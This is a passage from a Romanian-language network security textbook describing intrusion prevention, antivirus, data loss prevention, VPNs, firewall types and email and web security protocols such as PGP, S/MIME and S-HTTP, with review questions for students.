sistemele de prevenție sunt plasate in-line și pot preveni/bloca intruziunile odată ce acestea au fost
detectate. Mai exact, sistemul de IPS poate trimite o alarmă, elimina pachetele malițioase, reseta
conexiuni și/sau bloca traficul de la respectiva adresă IP. O soluție IPS poate, de asemenea, să
corecteze erorile Cyclic Redundancy Check6 (CRC), să defragmenteze pachetele, să prevină
problemele de secvențiere TCP și să curețe transporturile nedorite și opțiunile la nivel de layere.
Clasificările și funcțiile IPS sunt, în general, similare cu cele ale IDS. Principala lor
diferență este că IPS funcționează în timp real și pot bloca automat atacurile de rețea, iar fiecare IPS
include și un modul IDS.
Mai menționăm că plasarea corectă a sistemelor IDS/IPS în rețea nu afectează topologia
acesteia, dar este foarte importantă pentru o monitorizare optimă și obținerea unui efect maxim de
protecție.

11.4. Software-ul antivirus (anti-malware)


Antivirus sau software antivirus (adesea abreviat ca AV), cunoscut și sub numele de software
anti-malware, este un program care, instalat pe calculator sau pe dispozitivul mobil, are menirea de
a-l proteja de infectarea cu malware. Termenul „malware“ este un termen generic, care desemnează
orice tip de program software dăunător bunei funcţionări a calculatorului, cum ar fi viruşii, viermii,
caii troieni sau programele de monitorizare spyware. Însă, deşi antivirusul ajută la protecţia
calculatorului, el nu poate detecta şi stopa toate tipurile de malware.

6
Control Redundant Ciclic este o metodă matematică folosită pentru a verifica integritatea datelor. Este o formă de
sumă de control, ce se bazează pe teoria polinoamelor de lungime maximă.
În general sunt două moduri în care un antivirus identifică un program malware: detecţie pe
bază de semnături şi detecţia bazată pe comportament.
Detecţia pe bază de semnătură funcţionează similar sistemului imunitar al omului. El
scanează calculatorul pentru caracteristici sau semnături ale programelor cu funcţionare dăunătoare
cunoscute. Scanarea se face prin referirea la un dicţionar de programe malware cunoscute: dacă
ceva din calculator se potriveşte cu unul din tiparele conţinute în dicţionar, antivirusul încearcă să-l
neutralizeze. Asemeni sistemului imunitar uman, abordarea bazată pe dicţionar necesită actualizări,
cum sunt vaccinurile pentru gripă, ca să poată asigura protecţia necesară faţă de noi versiuni de
malware. Antivirusul poate oferi protecţie faţă de ceea ce poate recunoaşte ca fiind periculos.
Problema este că răufăcătorii dezvoltă noi versiuni de malware într-un ritm atât de rapid încât
furnizorii de soluţii antivirus nu reuşesc să ţină pasul cu ei. Ca o consecinţă, indiferent cât de recent
actualizat este programul antivirus, va exista întotdeauna o variantă de malware care poate ocoli
protecţia oferită de antivirus.
Cu mecanismul de detecţie bazat pe comportament, antivirusul nu încercă să detecteze un
program malware cunoscut ci monitorizează comportamentul în funcţionare a programelor software
instalate pe calculator. Atunci când un program are o funcţionare suspectă, cum ar fi încercarea de
accesare a fişierelor protejate sau modificarea altui program, antivirusul detectează comportamentul
suspect şi alertează asupra acestuia. Această abordare oferă protecţie faţă de cele mai noi tipuri de
malware care nu sunt încă incluse în niciun dicţionar. Problema acestei abordări este că poate
genera atenţionări false. Utilizatorul calculatorului ar putea fi nesigur pe ce să permită sau nu şi, în
timp, să devină neutru faţă de toate aceste atenţionări. El ar putea fi tentat să dea clic pe „Acceptă“
la toate notificările, lăsând astfel calculatorul vulnerabil la atacuri şi infectare. În plus, în momentul
când comportamentul suspect este semnalat, programul malware cel mai probabil că este deja
instalat şi se execută pe calculator şi nu avem de unde şti ce a făcut până când a fost detectat de
către antivirus.
Antivirusul este o componentă importantă a securităţii calculatorului sau a dispozitivului
mobil, fiind parte importantă a securității rețelei unei întreprinderi. Cele mai performante soluții de
acest fel la ziua de azi includ următoarele facilități:
 scanare malware on-demand;
 scanarea malware on-access;
 website rating;
 blocarea URL-ului rău intenționat;
 protecția împotriva phishing-ului;
 detectarea bazată pe comportament
 scanarea la vulnerabilități.
Cu toate astea, esenţialul este de reținut că, indiferent de modul cum funcţionează programul
antivirus folosit, acesta nu poate proteja mereu faţă de orice tip de malware.

11.5. Sisteme de prevenire a scurgerilor/pierderilor de date


Un sistem DLP - Data Loss Prevention este o componentă a sistemului general de securitate
informaţională a unei întreprinderi, care prezintă o totalitate de sisteme şi tehnologii
software/hardware ce permit identificarea, monitorizarea şi protejarea fluxurilor informaţiilor
confidenţiale de la scurgerile atât intenționate, cât şi cele din imprudenţă.
Obiectivul general al sistemului constă în prevenirea scurgerilor de informaţii confidenţiale
şi controlul fluxurilor informaţionale la toate etapele ciclului vital (creare, transmitere, modificare
etc.) a acestora în cadrul sistemului informaţional al întreprinderii, indiferent de starea informaţiei,
adică:
 în repaus (stocate în baze de date, medii de stocare, partajări de reţea, staţii de lucru);
 în mişcare (transmise în interiorul şi exteriorul companiei (HTTP(S), FTP, SMTP,
IM, etc.);
 în folosinţă (accesare, redactare, copiere, imprimare, etc.).
Obiectul automatizării prevenirii pierderii/scurgerii de date constau în următoarele:
 controlul tuturor canalelor de circulaţie a informaţiilor în formă electronică, care sunt
utilizate cu regularitate în activitatea cotidiană;
 monitorizarea/blocarea acţiunilor utilizatorilor în raport cu informaţiile confidenţiale
în format electronic, reieşind din politicile de securitate;
 detectarea informaţiilor protejate conform conţinutului ei indiferent de formatul
păstrării, canalelor de transmitere, parafelor şi altor atribute;
 depistarea utilizatorilor răufăcători pentru atragerea acestora la răspundere în
conformitate cu prevederile legislaţiei în vigoare;
 educarea utilizatorilor, prin rularea iniţială într-un mod în care notifică utilizatorii
atunci când acţiunile acestora contravin politicilor de securitate, ridicând astfel
gradul de conştientizare al acestora.
Conceptul funcţional al unui sistem DLP se bazează pe analiza fluxurilor de date, ce
intersectează perimetrul sistemului informaţional supus protejării. În cazul detectării în acest flux a
informaţiilor marcate drept confidenţiale, se iniţiază componenta activă a sistemului, care
întreprinde acţiuni predefinite de politici stabilite: blocarea, monitorizarea sau preîntâmpinarea.
Soluţiile de tip DLP implementate prezintă de obicei un complex din trei module ce
interacţionează între ele prin interfaţa de monitorizare şi gestionare a datelor confidenţiale:
 modulul de scanare a traficului în reţea se aplică la datele în mișcare prin
intermediul HTTP(S), FTP, SMTP, IM (Skype, Icq, etc), etc.;
 modulul client pe stațiile de lucru, responsabil pentru procesele de accesare,
redactare, copiere, ștergere și imprimare a informației;
 modulul incorporat pe servere de fişiere sau baze de date, responsabil de datele ce se
află în repaus, gestionarea şi monitorizarea accesărilor.
Aceste module în ansamblul lor îndeplinesc următoarele funcții specifice unui sistem DLP:
 descoperirea şi clasificarea datelor prin procese automate ce caută, inventariază şi
clasifică toată informaţia aflată în resursele informaţionale, fie că e vorba de servere,
staţii de lucru sau alte echipamente;
 monitorizarea şi/sau protejarea informaţiilor: în funcţie de modul de configurare,
sistemul poate monitoriza sau chiar şi bloca manipularea datelor într-un mod conform cu
politicile companiei; datele pot fi securizate proactiv pentru a preveni scurgerile de
informaţii confidenţiale;
 administrarea şi raportarea: sistemul alertează automat persoanele responsabile cu
verificarea securităţii cu privire la potenţialele activităţi incorecte; sunt raportate
modurile în care sunt manipulate informaţiile clasificate.
Prevenirea pierderilor datelor este necesară pentru protejarea acestora de la scurgerea
ocazională sau intenţionată indiferent dacă este informaţia proprie a întreprinderii sau a clienţilor,
datele financiare, proprietatea intelectuală sau secretul comercial, iar sistemele de prevenire a
pierderii/scurgerii de date prezintă o soluţie complexă de protecţie a datelor, care permite
micşorarea riscurilor de scurgere a acestora şi sporirea controlului privind utilizarea lor de către
angajaţi, precum şi supravegherea sectoarelor şi proceselor cu risc sporit sau cu pericol potenţial.

11.6. Rețele virtuale private


O reţea virtuală privată (Virtual Private Network -VPN) este o metodă de conectare la o
reţea privată (de exemplu: reţeaua de la birou) sau de interconectare a mai multor rețele private (de
exemplu: sedii de firmă) prin intermediul unei reţele publice (de exemplu: Internet).
Reţelele VPN utilizează:
 legături autentificate, pentru a asigura că numai utilizatorii autorizaţi se pot
conecta la reţeaua privată;
 criptarea, pentru a asigura că alte persoane nu pot intercepta şi utiliza datele care
sunt transmise prin Internet;
 mecanisme și servicii de control al accesului, pentru a diferenția utilizatorii.
De asemenea, tehnologia VPN permite unei companii să se conecteze la filialele sale sau la
alte companii printr-o reţea publică, cum ar fi Internet, ajutând-o, în acelaşi timp, să menţină
securitatea comunicaţiilor. Conexiunea VPN prin Internet operează logic ca o legătură de reţea de
arie largă dedicată (WAN).
Există trei tipuri principale de rețele VPN:
 VPN-urile cu acces de la distanță (Remote Access VPN), care permit utilizatorilor
să se conecteze securizat la un site central printr-o rețea publică;
 Site-to-site VPN, care utilizează tuneluri pentru a încapsula pachetele de date în
pachete IP normale pentru redirecționarea rețelelor bazate pe IP; acest tip de VPN
utilizează criptarea și autentificarea pentru a asigura confidențialitatea și respectiv
integritatea datelor.
Remote Access VPN, numite şi reţele virtuale private cu dial-up, sunt conexiuni de tip
utilizator-către-LAN (figura 11.2) folosite cel mai adesea de companii ce au angajaţi cu necesităţi
de conectare la resursele reţelei companiei din diverse locaţii. De regulă, în momentul când se
doreşte accesul mai multor utilizatori la reţeaua locală, se foloseşte un server de acces în reţea
pentru a acorda drepturi utilizatorilor şi calculatoarelor acestora.

Figura 11.2. Remote-access VPN

În general, în cazul implementării unei tehnologii VPN între sediile companiei, este de
preferat să se apeleze la acelaşi furnizor de Internet pentru toate locaţiile. Apropierea geografică de
regulă nu are nici o legătură cu “apropierea pe Internet”.
Prin utilizarea de echipamente dedicate şi criptare pe scară largă, o companie poate conecta
multe locaţii (sucursale) fixe pe o reţea publică cum ar fi Internetul. VPN-ul tip site-to-site poate fi
de două tipuri, şi anume: Intranet VPN și Extranet VPN.
 VPN-urile intranet (Intranet VPN, figura 11.3) permit extinderea rețelelor private
prin Internet sau alt serviciu de rețea publică intr-o manieră securizată;
 VPN-urile extranet (Extranet VPN, figura 11.4) permit conexiuni securizate între
toate tipurile de utilizatori.
VPN implementată pe intranet reprezintă reţeaua virtuală privată între sediile şi
departamentele aceleiaşi firme. Intranet-ul este definit ca o legătură semi-permanentă peste o reţea
publică între un WAN şi o filială a companiei. Aceste tipuri de conexiuni LAN-LAN se presupune
că au cel mai mic risc din punct de vedere al securităţii pentru că firmele au încredere în filialele lor.
În astfel de cazuri compania are control asupra reţelei/nodurilor destinaţie cât şi asupra celei sursă.
Administratorii de sistem trebuie să decidă dacă această situaţie este întâlnită şi în propria rețea
locală.
Într-o reţea privată cantităţi mari de date sunt schimbate frecvent între LAN-uri, deci
importantă este viteza de transmisie şi interoperabilitatea. LAN-urile care sunt conectate prin
intermediul unor baze de date centralizate sau prin alte resurse de calcul răspândite în reţeaua firmei
ar trebui să fie considerate ca făcând parte din aceeaşi reţea. Motivul principal pentru care
majoritatea organizaţiilor se orientează către tehnologia VPN este costul redus al acestei
implementări.

Figura 11.3. Intranet site-to-site VPN

VPN implementată pe extranet reprezintă reţeaua virtuală privată care este relativ izolată
faţă de intranet. Extranet-ul este destinat comunicării cu partenerii, clienţii, furnizorii şi cu angajaţii
la distanţă. Securizarea unei reţele de dimensiuni mari necesită îndrumări şi instrumente adecvate.
Un VPN extranet trebuie să ofere o ierarhie a securităţii şi accesarea datelor confidenţiale să se facă
sub cel mai strict control. Principalul obiectiv al unui Extranet sau al VPN-ului între companii este
să se asigure că datele secrete ajung intacte şi exact cui îi sunt adresate fără a exista riscul de a
expune resursele protejate unor eventuale ameninţări, aşa că firmele ar trebui să ia în considerare
cele mai avansate soluţii de VPN.

Fig. 11.4. Extranet site-to-site VPN

Un Extranet VPN sigur este acela în care o companie împarte informaţii cu clienţii,
partenerii, furnizorii şi angajaţii aflaţi la distanţă prin intermediul reţelei publice stabilind legături
unidirecţionale de la un capăt la altul printr-un server VPN. Acest tip de sistem permite unui
administrator de reţea să definească drepturi specifice, cum ar fi cele ce ar permite unui membru din
conducerea unei firme partenere să acceseze diferite/anumite rapoarte de vânzări de pe un server
protejat. Acest tip de acces nu este posibil cu orice tip de soluţie VPN.
Într-o situaţie reală de interconectare între parteneri de afaceri, administratorii trebuie să
caute o soluţie de VPN care să filtreze accesul la resurse în funcţie de cât mai multe parametrii
posibili, inclusiv sursa, destinaţia, utilizarea aplicaţiei, tipul de criptare şi autentificare folosit, şi
identităţile individuale şi de grup. Managerii de sistem trebuie să identifice utilizatorii individual,
nu numai adresele IP, fie prin parole, token card, smart card, sau orice alta metode de autentificare.
Parolele sunt de obicei suficiente pentru o aplicaţie obişnuită de birou, dar nu sunt la fel de sigure
precum token-urile sau smart cardurile.
Reţelele private virtuale folosesc Internet-ul pentru a conecta mai multe reţele LAN între
ele, printr-o conexiune sigură. Conexiunile VPN realizează acest lucru cu două procese importante:
crearea de tunele şi securizarea. Mai întâi, o reţea VPN creează un circuit „virtual” între cele două
puncte conectate, prin intermediul Internetului. Apoi, foloseşte metoda creării de tunele pentru a
înfăşura datele în protocolul TCP/IP, astfel încât să poată fi transportate cu uşurinţă. Prin securizare
se înţelege criptarea şi încapsularea pachetelor trimise, astfel încât numai destinatarul căreia i se
adresează să le poată decodifica şi citi.
Specificaţiile pentru reţeaua VPN au la bază principiul flexibilităţii maxime și realizarea cât
mai rapidă. În acest scop se au în vedere implementarea a două soluţii:
 soluţie bazată pe circuite virtuale PPTP, uşor de pus în funcţiune şi de utilizat, dar
limitată la sistemul de operare Windows și cu securitate mai redusă, dar acceptabilă,
 evoluţia, în măsura posibilităţilor, către o soluţie mult mai performantă bazată pe o
„reţea virtuală OpenVPN”.
OpenVPN este o reţea privată virtuală (VPN) conformă protocolului de criptografie Secure
Sockets Layer (SSL) care asigură comunicaţii sigure pe Internet, permite metode de autentificare
flexibile ale clienţilor bazate pe certificate şi permite politici de control a accesului utilizatorilor
folosind reguli de firewall aplicate interfeţei VPN virtuale.
Pentru VPN-ul nativ din Windows (server) sau alte dispozitive comerciale (Cisco) există
suport tehnic, dar în schimb costă mult.

11.7. Firewall

11.7.1. Noțiune de firewall


Un firewall, denumit și paravan de protecție este un dispozitiv sau o serie de dispozitive
hardware, software sau combinate, configurate în așa fel încât să filtreze, să cripteze sau să
intermedieze traficul între diferite domenii de securitate pe baza unor reguli predefinite.
Firewall-urile au fost utilizate ca prima linie de protecție a rețelei pentru mai mult de 25 de
ani. Ele plasează o barieră între rețelele interne sigure și controlate și rețelele externe nesigure, cum
ar fi Internetul.
De la apariția sa firewall-urile au evoluat, fiind realizate în baza a patru concepte: proxy
firewall, stateful inspection firewall, unified threat management (UTM) firewall, next-generation
firewall (NGFW).
Proxy firewall este unul dintre primele tipuri de firewall. El acționează ca un intermediar,
astfel încât să nu existe un contact direct între clientul pe o rețea internă și serverul unei rețele
exterioare periculoase. Un proxy este o soluție software care permite comunicarea între două rețele
intr-o maniera protejata.
Sistemul pe care rulează se mai numește aplication level gateway. Are ca scop să furnizeze
un gateway prin care informația poate trece de la rețeaua de încredere la cea potențial periculoasă.
Tipic, proxy-ul autentifică userul și autorizează adresa sursă și destinație și permite sau respinge
protocolul. Pentru a funcționa, serverul cere împuterniciri pentru fiecare protocol (de exemplu FTP,
http, telnet).
Serviciile proxy pot fi la nivel aplicație sau la nivel circuit. Proxy-ul la nivel aplicație trebuie
să știe aplicația particulară pentru care este furnizat serviciul (se mai numesc servicii proxy dedicate
unui protocol). Serviciile proxy la nivel circuit se numesc așa deoarece creează un circuit între
hosturile sursă și destinație, între client și server.
In general, firewall-urile proxy tind să furnizeze protecție mai bună decât filtrarea de
pachete. În ceea ce privește debitul efectiv (throughput) situația este inversă.
Firewall cu filtrarea dinamică a pachetelor (stateful inspection firewall) modifică regulile în
concordanță cu cerințele. Stateful inspection firewall îmbunătățește semnificativ abilitățile filtrării
pachetelor deoarece este capabil să memoreze atributele semnificative ale fiecărei conexiuni. De
exemplu, își amintește pachetele care pleacă și permite pachetelor corespondente care sosesc să
treacă. Toate pachetele sunt procesate rapid deoarece este simplu să se determine dacă ele aparțin
unei conexiuni deja inspectate.
Filtrarea pachetelor se face la nivel rețea, bazată pe informațiile conținute de header-ul unui
pachet IP, sau la nivel transport (unde acționează protocoalele TCP si UDP).
Firewall UTM (unified threat management firewall) combină de obicei funcții cum ar fi
controlul sesiunii de stare, prevenirea intruziunilor și scanarea anti-virus. Acesta poate include, de
asemenea, servicii adiționale și, deseori, și gestionarea cloud-ului. Principalele avantaje ale UTM -
simplitate și confort.
Unified Threat Management (UTM) este o soluție completă de securitate informatică care a
apărut relativ recent (2004) în industria de securitate a rețelelor informaționale câștigând încredere
în protejarea rețelelor organizațiilor ca soluție de securitate principală. În teorie UTM este
îmbunătățirea vechiului firewall cu posibilitatea de a efectua mai multe funcții de securitate într-un
singur dispozitiv și conține pe lângă funcțiile de firewall clasic și servicii de IPS și IDS. Pe lângă
acestea se mai adaugă funcții de gateway antivirus, gateway anti-spam, funcții VPN, filtrare de
conținut web, echilibrarea încărcării legăturilor (load balancing) și prevenirea scurgerii de
informații sensibile ale rețelei.

11.7.2. Firewall NGFW de nouă generație


Firewall de nouă generație (NGFW - Next-generation firewall) a venit după anul 2009 ca
răspuns la noua provocare, când tehnologiile firewall trebuiau integrate pentru a face față noilor
tendințe de virtualizare și cloud, dar și a segmentării rețelelor. Companiile, dar și dezvoltatorii de
soluții firewall, trebuiau să implementeze o soluție care să acopere toate mediile noi, cu
echipamente de la dezvoltatori diferiți, administrare complexă și lipsa unei continuități a securității.
În acest context, în care accentul se pune din ce în ce mai frecvent pe abordarea proactivă a
problemelor de securitate, metodele de protecție ale infrastructurilor IT bazate pe clasicele firewall-
uri își demonstrează rapid limitele. Conform specialiștilor, principalele limitări ale firewall-urilor
tradiționale comparativ cu noile soluții NGFW constau in faptul ca:
 nu pot realiza o inspecție detaliată a pachetelor de date vehiculate în rețea, pentru a
realiza o analiză în profunzime a traficului;
 nu pot monitoriza și controla modul în care comunică aplicațiile între ele în cadrul
rețelei;
 nu pot depista, semnala și/sau corecta automat anomaliile de comportament ale
aplicațiilor, pe baza seturilor de reguli, profile și politici definite;
 nu oferă o vizibilitate extinsă asupra întregii infrastructuri informatice, împiedicând
decelarea rapida a potențialelor zone critice și/sau amenințări.
Firewall NGFW axat pe amenințări (Threat-focused NGFW firewall) include toate
capabilitățile unui NGFW tradițional și oferă, de asemenea, detectarea și remedierea avansată a
amenințărilor. Un NGFW axat pe amenințări ajută la:
 determinarea, datorită contextului complet al contextului, resurselor cu cele mai expuse
riscului;
 reacționarea rapidă la atacuri prin automatizarea inteligentă a securității care stabilește
politicile și reglează protecția într-un mod dinamic;
 detectarea activității evazive sau suspecte cu corelarea evenimentelor în rețea și
endpoint;
 reducerea în mod semnificativ a timpului de la detectare la curățare, cu aplicarea
securității retrospective, care monitorizează continuu activitatea suspectă și
comportamentul chiar după inspecția inițială;
 simplificarea administrării și reducerea complexității cu ajutorul politicilor unificate care
oferă protecție pe tot parcursul ciclului de viață al unui atac.
Putem afirma că firewall-urile de noua generație oferă răspunsuri viabile la toate aceste
probleme, integrând unitar mai multe tehnologii de securitate (Intrusion Prevension Systems,
Advanced Malware Protection, Network-Address Translation, Stateful Protocol Inspection etc.) și
concentrându-se pe identificarea, monitorizarea și controlul - prin tehnologii si metode variate - a
aplicațiilor care rulează în rețea.
Astfel, prin unificarea mai multor soluții și niveluri de securitate într-un singur echipament
se asigură o simplificare a arhitecturilor extinse și complexe și o reducere a efortului de
management al soluțiilor de securitate, abordarea threat-centric integrată permițând depistarea și
blocarea rapida a amenințărilor avansate, de tip multi-vector. În același timp, experții Gartner spun
ca în anul 2020, 99% din breșele de securitate pentru firewall vor fi cauzate doar de proasta
configurare a soluțiilor, nu de faptul că acestea au probleme, iar 15% din companii vor utiliza tot
soluții multiple, cheltuind bani și pierzând timp cu mai multe moduri de control.
După cum am mai menționat, securitatea rețelei înseamnă o totalitate de măsuri și
instrumente implementate într-un proces unic, dirijat și monitorizat în permanență. Toate soluțiile
de securitate expuse sunt indispensabile pentru asigurarea securității rețelei unei întreprinderi, iar
lipsa unei componente din întregul sistem de asigurare a securității poate produce o breșă de
securitate, și respectiv provoca urmări imprevizibile în activitatea acestei întreprinderi.

11.8. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Realizai un studiu pentru a relata cantitativ și calitativ utilizarea metodelor da atac
asupra rețelelor de calculatoare la nivel global pentru ultimii 3 ani.
2. Dezvăluiți avantajele utilizării IDS și IPS în rețelele de calculatoare. Care sunt
principalele deosebiri și asemănări în funcționalitățile IDS și IPS.
3. Descrieți tendințele în evoluția sistemelor antivirus moderne.
4. Care sunt principalele funcții specifice uni DLP?
5. Descrieți avantajele utilizării VPN atât pentru corporații cât și pentru utilizatorii
simpli.
6. Care sunt funcțiile de bază ale uni Firewall? Care sunt tendințele în realizarea unui
Firewall modern?
TEMA 12: PROTOCOALE DE SECURITATE ÎN REȚEA

Obiectivele temei:
 Analiza protocoalelor la Nivelul Aplicație.
 Analiza protocoalelor la Transport.
 Analiza protocoalelor la Nivelul Rețea.
 Analiza protocoalelor la Nivelul Legătură de Date.

Cuvinte-cheie:
PGP, SET, VPN,
S/MIME, KERBEROS, PPP,
S-HTTP, TLS/SSL, RADIUS
HTTPS, IPSec,

Protocoale de rețea de bază IP, TCP, UDP, BGP, DNS nu mai pot asigura nivelul necesar de
securitate, fiind pasibile diverselor atacuri, iar cerința și aspirația de asigurare a securității și a
caracterului privat al informației au condus la elaborarea și implementarea mai multor protocoale și
standarde de securitate, printre care se numără: protocoalele Secure Socket Layer (SSL) și Secure
Transport Layer (TLS), Internet Protocol Security (IPSec), Secure HTTP (S-HTTP), protocoale de
securitate pentru e-mail (PGP și S / MIME), DNDSEC, SSH și altele. Aceste protocoale au ca
obiectiv asigurarea securității informației pe întreaga stivă a protocolului TCP/IP.

12.1. Protocoale la Nivelul Aplicație


Securitatea Nivelului Aplicație este asigurată de mai multe protocoale, printre care se
numără PGP, S/MIME, S-HTTP, HTTPS, SET, KERBEROS.
12.1.1. PGP
Cerințele de securitate în poșta electronică au condus la realizarea mai multor pachete de
programe destinate protecției criptografice a scrisorilor trimise prin rețele. Dintre acestea, cel mai
popular este PGP (Pretty Good Privacy) dezvoltat de Philip Zimmermann în SUA. Acest pachet de
programe a stârnit serioase controverse, datorită răspândirii sale pe Internet și a folosirii lui în toată
lumea, fără să se respecte drepturile de licență și de export, destul de rigide în privința algoritmilor
criptografici. Zimmerman a fost anchetat, în 1994, de o comisie federală, pentru acuzația de
nerespectare a legilor americane privind exportul de sisteme criptografice. FBI l-a învinuit pe
Zimmerman de punerea pe Internet a PGP-ului, în arhive publice, ceea ce a condus la o răspândire
necontrolabilă a utilizării sale. PGP-ul este folosit astăzi de diverse categorii de utilizatori, de la
simpli studenți și particulari pană la organizații naționale, internaționale și agenții guvernamentale.
PGP este un pachet de programe destinat protecției poștei electronice și a fișierelor, prin
cifrare clasică și cu chei publice. Cu ajutorul său se pot stabili modalități sigure de comunicație între
persoane, nefiind necesară schimbarea prealabilă a unor chei de cifrare. PGP include un sistem sigur
de gestiune a cheilor, autentificarea datelor prin semnătură digitală și compresia datelor. El
funcționează pe diferite platforme, inclusiv MS-DOS, UNIX, VAX/VMS și altele.
PGP satisface trei cerințe fundamentale: caracterul privat al poștei electronice, autentificarea
emițătorului și autentificarea mesajelor. Aceste cerințe sunt realizate prin:
 criptarea fișierelor - poate fi folosit pentru a cripta fișiere proprii, folosind unul dintre
algoritmii de criptare cu cheie secretă AES, CAST5, 3DES, IDEA, Twofish, Blowfish,
Camellia; după criptare, fișierul poate fi decriptat doar de cineva care cunoaște parola de
criptare a fișierului;
 crearea de chei secrete si publice - aceste chei sunt necesare pentru a cripta și semna
mesajele transmise sau pentru a decripta mesajele primite;
 gestionarea cheilor - PGP-ul poate fi folosit pentru a crea și întreține o bază de date care să
conțină cheile publice ale persoanelor cu care vrem să corespondăm;
 transmiterea și recepționarea de mesaje e-mail criptate - cu ajutorul PGP-ului se pot trimite
scrisori criptate și decripta scrisorile primite;
 folosirea semnăturilor digitale - PGP-ul poate face o semnătură electronică a documentelor
sau poate verifica semnătura oricărei persoane, folosind algoritmul RSA sau ELGAmal și
una din funcțiile hash MD5, SHA-1, RIPEMD-160, SHA-256, SHA-384, SHA-512;
 certificarea cheilor - PGP-ul o asigură prin semnarea electronică a cheilor publice;
 revocarea, dezactivarea și custodia cheilor: dacă cheile sunt compromise, acestea pot fi
revocate sau dezactivate; acestea pot fi ținute la loc sigur, folosind facilitățile de custodie;

26
 configurarea după necesități a PGP-ului - setările variabilelor din fișierul de configurare a
PGP-ului pot fi schimbate;
 folosirea serverelor de chei PGP de pe Internet – există posibilitatea de a adăuga o cheie
publică la o bază de date server sau de a obține alte chei publice care se află pe server.
Securitatea mesajelor în PGP este asigurată de criptografia cu cheie privată, numită de PGP
criptografie convențională. PGP-ul nu reclamă un schimb prealabil de chei între utilizatori. El
folosește o combinație a sistemului criptografic simetric și cu chei publice: sistemul simetric este
utilizat pentru cifrarea conținutului scrisorilor sau fișierelor, iar sistemul asimetric RSA - pentru
protecția și distribuția cheii K de unică întrebuințare (numită și cheie de sesiune) cu care se face
cifrarea simetrică a scrisorii, precum și pentru autentificarea prin semnătură digitală a mesajului și a
emițătorului.
La emisia unei scrisori, atunci când sunt folosite atât serviciile de confidențialitate cât și de
autenticitate, PGP execută următoarele prelucrări:
 folosindu-se un algoritmul de hash, se creează un cod de autentificare MAC (Message
Authentication Code):
MAC = MD5 (Mesaj);
 prin cifrarea cu cheia secretă SKA a emițătorului A al scrisorii, folosindu-se algoritmul RSA,
se creează semnătura digitală pentru autentificarea mesajului și a originii sale:
S = RSA (MAC, SKA);
 scrisoarea este comprimată, utilizând unul din algoritmii ZIP, ZLIB, BZIP2. Acest lucru
asigură o reducere a volumului de date ce trebuie cifrate și apoi transmise:
Mesaj-comprimat = zip (Mesaj);
 se generează pseudoaleator o cheie de cifrare K (folosită doar pentru acest mesaj), numită
cheie de sesiune:
K= random();
 mesajul comprimat anterior este apoi cifrat cu ajutorul unuia dintre algoritmii simetrici
incluși în protocol, folosindu-se cheia generată în pasul precedent:
mesaj-cifrat = EK(Mesaj-comprimat);
 folosind RSA cu cheia publică PKB a destinatarului B al scrisorii, se pune în anvelopă cheia
de sesiune pentru a putea fi trimisă în mod sigur la receptor. Acest lucru înseamnă cifrarea
cheii de sesiune cu cheia publică a destinatarului:
Cheie-sesiune-anvelopată = RSA (Cheie-sesiune, PKB);
 se creează scrisoarea protejată, în vederea transmiterii ei la destinație, folosind servicii
obișnuite de e-mail:
scrisoare-protejată = [Key-ID, S, Data-semnătură, Cheie-sesiune-anvelopată, Mesaj-cifrat]

27
12.1.2. S/MIME
S/MIME (Secure Multi-Purpose Internet Mail Extensions) este o altă metodă sigură de
trimitere a mesajelor e-mail care utilizează sistemul de criptare RSA. S/MIME este inclus în cele
mai recente versiuni ale browserelor Web de la Microsoft și Netscape și a fost, de asemenea,
aprobat de alți furnizori care fac produse de mesagerie. RSA a propus S/MIME ca standard pentru
Internet Engineering Task Force (IETF).
MIME în sine, descrisă în standardul IETF numit Request for Comments (RFC) 1521,
precizează modul în care va fi organizat un mesaj electronic. S/MIME descrie modul în care
informația ce trebuie criptară și certificatul digital pot fi incluse ca parte a corpului mesajului.
S/MIME urmărește sintaxa furnizată în formatul #7 al standardului criptografiei cu cheie publică
descris în RFC 2315.
Utilizarea corectă a standardului S/MIME impune însă anumite restricții asupra utilizării
aplicațiilor tradiționale de e-mail și a mediului de lucru în care sunt utilizate:
 expeditorul și destinatarul trebuie să convină asupra utilizării aplicațiilor de e-mail client
care acceptă acest standard; în caz contrar, clientul de e-mail al destinatarului afișează în
scrisori fișierele-atașamente „smime.p7s”, pe care destinatarul, în mod normal, nu le
poate interpreta corect;
 utilizarea eficientă a S/MIME necesită o abordare integrată a securității; aceasta
înseamnă că este necesar ca mesajele să fie protejate nu numai de-a lungul căii de la
expeditor la destinatar, ci și în mediul de lucru al expeditorului și al destinatarului; în
special, nerespectarea acestei cerințe poate duce la scurgerea informațiilor confidențiale
sau la modificarea neautorizată a mesajelor, precum și la compromiterea cheilor secrete
direct pe computerele utilizatorilor;
 S/MIME este, în principiu, incompatibilă cu serviciul de e-mail; acest lucru se datorează
faptului că criptografia cu chei publice, care stă la baza standardului S/MIME, protejează
confidențialitatea și integritatea mesajelor în drumul de la expeditor spre destinatar; în
același timp, confidențialitatea și integritatea mesajelor sunt inaccesibile în utilizarea
tradițională a mesajelor Web, deoarece furnizorul de servicii de e-mail are capacitatea de
a citi mesajele și de a le modifica; în același timp, încercările de a utiliza semnarea sau
criptarea mesajelor pe partea de server reprezintă o compromitere a cheilor secrete ale
utilizatorului; în plus, principalul avantaj al serviciului de e-mail - disponibilitatea
acestuia de pe orice computer în care există un browser web - este contrar cerinței de a
controla securitatea mediului de lucru atunci când se utilizează S/MIME.

12.1.3. S-HTTP

28
Protocolul nativ pe care clienții și serverele World Wide Web le utilizează pentru a
comunica este HTTP (Hypertext Transfer Protocol). HTTP este ideal pentru comunicații deschise,
dar nu oferă caracteristici de autentificare și criptare. S-HTTP a fost dezvoltat pentru a funcționa
împreună cu HTTP pentru a permite clienților și serverelor să se angajeze în tranzacții private și
sigure. S-HTTP este util în special pentru criptarea informațiilor bazate pe formulare pe măsură ce
acestea trec între clienți și servere, criptarea fiind realizat[ numai la mesaje de nivel HTTP.
S-HTTP nu a fost niciodată pe deplin acceptat de furnizorii de browsere web, cum ar fi
Microsoft și Netscape, totuși, S-HTTP este suportat de un șir de astfel de produse. Aceasta suportă
o varietate de algoritmi criptografici și regimuri de lucru. Mesajele pot fi protejate prin utilizarea
semnăturilor digitale, autentificării și criptării. La primul contact, expeditorul și receptorul stabilesc
preferințele pentru criptare și manipulare a mesajelor securizate.
Pot fi utilizate un șir de algoritmi de criptare și tehnici de securitate, inclusiv criptarea DES
și RC2 sau semnarea cheilor publice RSA. În plus, utilizatorii pot alege să utilizeze un anumit tip de
certificat sau niciun certificat. În cazurile în care certificatele de cheie publică nu sunt disponibile,
